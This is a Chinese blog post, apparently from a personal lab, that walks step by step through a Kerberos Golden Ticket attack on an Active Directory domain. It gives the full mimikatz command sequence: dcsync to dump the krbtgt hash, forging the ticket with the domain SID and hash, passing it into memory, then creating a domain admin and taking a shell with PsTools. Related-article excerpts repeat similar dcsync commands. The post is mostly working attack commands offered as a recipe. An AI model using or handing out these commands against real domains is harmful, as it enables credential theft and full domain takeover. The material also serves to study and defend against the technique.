黄金票据之拿shell——超详细步骤

最新推荐文章于 2024-12-06 11:10:58 发布
原创 最新推荐文章于 2024-12-06 11:10:58 发布 · 3.8k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #http #网络协议

本文档详细介绍了如何使用Mimikatz工具获取krbtgt账户的HTLMHASH,并生成黄金票据,以此实现域内权限提升。步骤包括查看krbtgt账户、使用mimikatz提权、导出krbtgt信息、生成和导入黄金票据,以及清除和使用票据进行操作。整个过程展示了域环境中的一种安全漏洞利用技术。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

黄金票据的意思是,当攻击者能够获取krbtgt的HTLM HASH后,攻击者就可以伪造一张票据授权票,去伪造正域内的任意用户访问到域内kerberos认证的所有服务资源。

域搭建环境:

域名:taozhi.online

域控(server2008):

域内机器(win7):

所需条件:

域名称:taozhi.online

域SID:

域控的krntgt账户的hash值

1.在域控机器上,查看域用户net user,确认是否有krbtgt账户。

2.打开mimikatz,执行privilege::debug进行提权。

3. 执行log——lsadump::dcsync /user:krbtgt导出查询信息(此时桌面会生成一个mimikatz的文档,记录里面的sid和Hash NTLM)

sid:S-1-5-21-2977540408-3764402457-1595006286

Hash NTLM:51a7dda975297923b6844020b8b1b5ac

4.在域内的任意一台机器上执行(我这里用的是win7),访问域控,拒绝访问

dir \\WIN-AJP4CU7AVGF.taozhi.online\c$

生成黄金票据并导入到内存

Kerberos::golden /user:administrator /domain:taozhi.online /sid:S-1-5-21-2977540408-3764402457-1595006286 /krbtgt:51a7dda975297923b6844020b8b1b5ac /ptt

打开新的cmd窗口,执行:dir \\WIN-AJP4CU7AVGF.taozhi.online\c$,可直接列出域控目录

黄金票据利用(环境与上面一样,此步骤5接着上面的步骤执行)

清除票据:

klist purge

 5.在域内的任意一台机器上执行(我这里用的是win7),生成黄金票据并导入到内存,此时在mimikatz的文件夹下还会生成一个ticket.kirbi的文件

kerberos::golden /user:administrator /domain:taozhi.online /sid:S-1-5-21-2977540408-3764402457-1595006286 /krbtgt:51a7dda975297923b6844020b8b1b5ac /ticket:ticket.kirbi

通过mimikatz中的kerberos::ptt功能将ticket.kirbi导入内存中。

kerberos::purge

kerberos::ptt tickett.kirbi

此时尝试创建一个xxx的域管账号,命令执行成功:

将pstools放入该台机器的桌面,并解压

成功拿到shell

RAG私域问答场景升级版方案(第二期方案)[2]:工业级别构建私域问答(业务问题、性能问题、安全成本问题等详细解决方案)
丨汀、的博客
08-07 897
RAG私域问答场景升级版方案(第二期方案)[2]:工业级别构建私域问答(业务问题、性能问题、安全成本问题等详细解决方案)
黄金票据原理制作与利用
G3et的博客
01-14 758
1、用域管理运行mimikatz抓取完所需的东西 ==> 再到域用户机器上运行伪造票据。2、krbtgt只存在域控上面,普通机器提权之类的无法获取到krbtgt的hash3、黄金票据可以获取任何Kerberos 服务权限,且由 krbtgt 的 hash 加密,黄金票据在使用的过程需要和域控通信****加粗样式。
【内网学习笔记】28、黄金票据
TeamsSix 的 CSDN 空间
09-27 596
0、前言 RT 在利用黄金票据(Golden Ticket)进行 PTP 票据传递时,需要先知道以下信息: 伪造的域管理员用户名 完整的域名 域 SID krbtgt 的 NTLM Hash 或 AES-256 值 其中 krbtgt 用户是域自带的用户,被 KDC 密钥分发中心服务所使用,属于 Domain Admins 组。 在域环境中,每个用户账号的票据都是由 krbtgt 用户所生成的,因此如果知道了 krbtgt 用户的 NTLM Hash 或者 AES-256 值,就可以伪造域内任意用户的身
域中黄金票据
https://www.cnblogs.com/zpchcbd/
09-11 1371
黄金票据(golden ticket):伪造票据授予票据(TGT),也被称为认证票据。 krbtgt账户:每个域控制器都有一个“krbtgt”的用户账户,是KDC的服务账户,用来创建票据授予服务(TGS)加密的密钥。 0x00 金票据利用条件: 域控中krbtgt账户NTLM密码哈希 域中的sid值 一台域中主机 与其说是一种攻击方式,不如说是一种后门,当域控权限掉后,再重新获取权限,因为常见...
【域权限维持】-黄金票据
qq_41617902的博客
11-07 1778
Windows域权限维持-黄金票据
利用黄金票据获取域控权限
qq_54713392的博客
06-30 605
利用黄金票据获取域控权限 (1)在域控服务器上用mimikatz获取krbtgt的sid和ntlm 提权执行命令:privilege::debug 获取用户krbtgt的信息执行命令lsadump::dcsync /domain:demo.com /user:krbtgt (2)获取krbtgt的sid和ntlm(这里尤其注意要去掉502) sid S-1-5-21-2189589203-2536092258-2850724310-502 ntlm c68811b401358f8d153cdb752e2
最新手工拿服务器Shell教程+工具猫魔盒+struts2漏洞利用工具+OBlogGetshell 0day
10-02
最新手工拿服务器Shell教程+工具猫魔盒+struts2漏洞利用工具+OBlogGetshell 0day
NaverGW-Kit:实现Naver Kerberos认证与rlogin的Shell脚本
它通过使用对称加密算法来实现用户和服务之间的认证,并且依赖于一个可信的第三方——密钥分发中心(KDC)。Kerberos协议的基本流程涉及客户端和KDC之间的交互,以及客户端和服务端之间的交互。 #### 2. rlogin协议...
网络安全渗透测试——名词解释
weixin_43778463的博客
10-12 3948
常用术语解释
密码安全攻防技术精讲
GitChat
07-03 3405
课程介绍 本课程内容将以作者亲身经历的事情为主,从技术的视野和攻防角度来剖析各种密码及其他技术对工作和个人生活的影响,将“高高在上”的技术拉进我们日常的生活中来。每一篇文章都是精挑细选的典型案例,背后都有真实故事和场景,以技术的方式来再现和还原。 非技术专业读者可以通过这些文章来了解和预防各种涉及密码的攻击,从事技术工作的读者可以按照文章的搭建环境进行实战实践。由于篇幅有限,密码攻防涉及的技术非常...
Hive官方使用手册——新Hive CLI(Beeline CLI)
热门推荐
三米学习笔记杂货铺
03-08 2万+
本文为自己翻译的译文,原文地址:https://cwiki.apache.org/confluence/display/Hive/HiveServer2+ClientsHive官方使用手册——新Hive CLI(Beeline CLI)这个页面描述了HiveServer2支持的不同客户端。其它的HiveServer2文档包含:HiveServer2 OverviewSetting Up HiveS...
kerberos 票据_域渗透之黄金票据的实际利用
weixin_39861905的博客
12-25 557
先介绍下Kerberos协议:Kerberos是一种由MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。在Kerberos协议中主要是有三个角色的存在:1:访问服务的Client(用户的机器客户端)2:提供服务的Server(服务端)3:KDC(Key Distribution Center)密钥分发中心其中KDC服务默认会安装在一...
内网渗透--Golden Ticket(黄金票据)制作&利用
qq_62169455的博客
01-17 2698
伪造TGT,不需要和KDC进行校验,金票可以直接在本地生成,在域内机器和非域内机器都可以使用。
3.4 Golden Ticket黄金票据制作原理及利用方式
GloryGod的博客
08-24 535
krbtgt用户,是系统在创建域时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成的,无法登录主机。
黄金票据制作原理及利用方式
Happy峰
09-23 3149
Golden Ticket黄金票据制作原理及利用方式 Krbtgt账户介绍 krbtgt用户,是系统在创建域时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成 的,无法登录主机 黄金票据原理 TGT=Krbtgt的html hash 加密 1、Kerberos中的TGT和Logon Session Key(CT_SK)是AS返回的 ,TGP它是由Krbtgt加密和签名的 ,krbtgt的NTLM Hash又是固定的,而CT_SK并不会保存在KDC中。 2、所以只要得到krbtgt
域渗透-白银票据黄金票据的利用
orange777
02-23 4058
最近做了一些靶场域渗透的实验,记录下一些关于白银票据黄金票据的问题。 0x01 白银票据的利用 1 环境信息 域控DC 192.168.183.130 域内主机win7 192.168.183.129 2 使用场景 在拿到一个普通的域成员权限的时候,可以尝试使用ms14-068伪造一个票据,从而让我们的域用户有域管理员权限。 3 利用过程 说明:这里是用vulnstack4靶机笔记的实验环境,来演示一下利用过程 获取sid whoami /all 伪造票据 MS14-068.exe -u 用户名@域
域渗透——黄金票据
最新发布
ygylemon的博客
12-06 984
黄金票据一般是对域内渗透提权之后,进行维权的一种操作。我想要上线这台服务器,对方也不能乖乖听话一直点我的木马吧,只好打一张黄金票据了,方便以后的管理操作。首先我们通过上一篇文章已经获得了域管理员的权限。
黄金票据传递攻击
2301_79742437的博客
01-28 803
网络安全
域权限维持—黄金票据和白金票据
lza20001103的博客
04-15 936
域权限维持—黄金票据和白金票据
票据打印演示系统——轻松实现票据打印功能
票据打印demo的知识点涉及了多个层面,包括票据打印的定义、打印流程、打印技术、软件开发和应用场景。以下是详细的分析: ### 票据打印的定义 票据打印是指使用专业的打印设备和软件对各种票据(如发票、收据、...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值